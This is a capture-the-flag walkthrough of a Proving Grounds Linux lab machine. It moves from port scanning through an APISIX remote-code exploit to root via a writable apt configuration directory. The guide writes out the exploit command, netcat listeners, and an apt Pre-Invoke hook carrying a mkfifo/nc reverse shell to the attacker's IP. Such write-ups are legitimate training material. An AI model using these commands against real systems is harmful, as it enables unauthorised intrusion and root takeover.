Basic Information: PG Practice Linux Machine, Level Easy, Target IP: 192.168.248.220
TL;DR for those who only want a quick solution.
- Found 43500 port is vulnerable to exploit 50829, exploit it grants you the initial foothold.
- /etc/apt/apt.conf.d directory is writable.
Initial Enumeration
Keep scanning for version information.
sudo nmap -sS 192.168.248.220 -p22,80,3306,43500 -vv -sV -A
- 22, a regular open SSH port, normally you don’t get the initial foothold from there.
- 80, http port, title Upright, nginx/1.18.0
- 3306, MySQL unauthorized
- 43500, OpenRest web app server, header showing APISIX/2.8
We’ll start to take a look of the web port 80 first by visiting http://192.168.248.220
content of port 80
- Nothing too special, just a website, clicking most of the buttons returns to the home page. Understandable, this is a CTF VM, no need to make it too functional. Using curl + grep and sed to find all the href keywords on the web, found nothing useful.
- One information could be useful is the email address [email protected]
- Obviously port 3306 and 43500 are very suspicious, but I would like to go through my regular steps on pentest, that is I would like to enumerate the directories on target’s web port 80 first. I normally use gobuster with dirb’s big.txt wordlist.
- gobuster dir –url “http://192.168.248.220” -w /usr/share/wordlists/dirb/big.txt
- Based on past experience, we don’t need to care about these three found folders, they don’t contain anything.
Now Let’s move on to port 3306, using mysql -h 192.168.248.220 is showing connection not allowed.
Our only hope is port 43500, visit the site showing nothing but an error message
- Remember that from the port scan, it is showing the title of the web port 43500 is APISIX/2.8, now let’s search it on exploit-db.com, or using searchsploit at Kali’s terminal
- Found one, the id is 50829, let’s grab it using searchsploit -m 50829, and then take a look how to use it.
- From header, it is showing the exploit is working against APISIX 1.3 – 2.12.1, our target’s version is APISIX 2.8, technically that should work.
- Take a look of the usage
- The arguments are target_url, lhost and lport
Initial Foothold
Previously we found the exploit 50829.py, now let’s use it against our target
- Before run it, set up a netcat listener first
- nc -nlvp 443
- Run the exploit
- python3 50829.py http://192.168.248.220:43500/ 192.168.45.235 443
- Nice the exploit is working, we are franklin in this system. But there is a problem, running ls -la showing my permission is denied. typing pwd showing we are in the /root directory
- To solve this issue, we’ll go to /home/franklin, before that switch to interactive shell first, we’ll use
- python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
- At /home/franklin, we found the local.txt, that’s one unprivileged flag.
Now we need to escalate the privilege
Privilege Escalation
Normally I’ll manually enumerate the system first, I’ll try
- sudo -l
- to see if I could run any command with sudo
- find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
- fo find any unusual Suid being set for some binaries, if there is any, lookup on https://gtfobins.github.io/# to see how to exploit it.
- actually I found /bin/ssh-agent’s suid is being set, but it is not exploitable.
I also tried to look into some files to see if there is any sensitive credential, unluckily found nothing. This is where I deploy linpeas.sh (https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) , it’s smarter and stronger than me.
- Deliver the linpeas.sh to the franklin’s reverse shell, chmod +x linpeas.sh to grant execution a bit to it, then run it.
- Found this key information that I as franklin could write to /etc/apt/apt.conf.d, though on the output, it said I could look it up on the given link https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files, I could not find a solution there. But it’s not too difficult to use google, just google etc apt apt.conf.d privilege escalation, I found this page to be very useful. https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
- To make the exploit work, it requires someone with root privilege running apt-get update
- looking into /etc/crontab, we see that the root user’s auto task has apt-get update. Which means we could escalate the privilege via /etc/apt/apt.conf.d
- Now we set up another netcat listener. I normally use the port numbers that are allowed to go through the firewall, like 443, 445, 22, 53, etc.
- nc -nlvp 445
- at franklin’s reverse shell, type the following commands, we should expect a reverse shell very soon.
- cd /etc/apt/apt.conf.d
- echo ‘apt::Update::Pre-Invoke {“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.235 445 >/tmp/f”};’ > pwn
Mission Accomplished!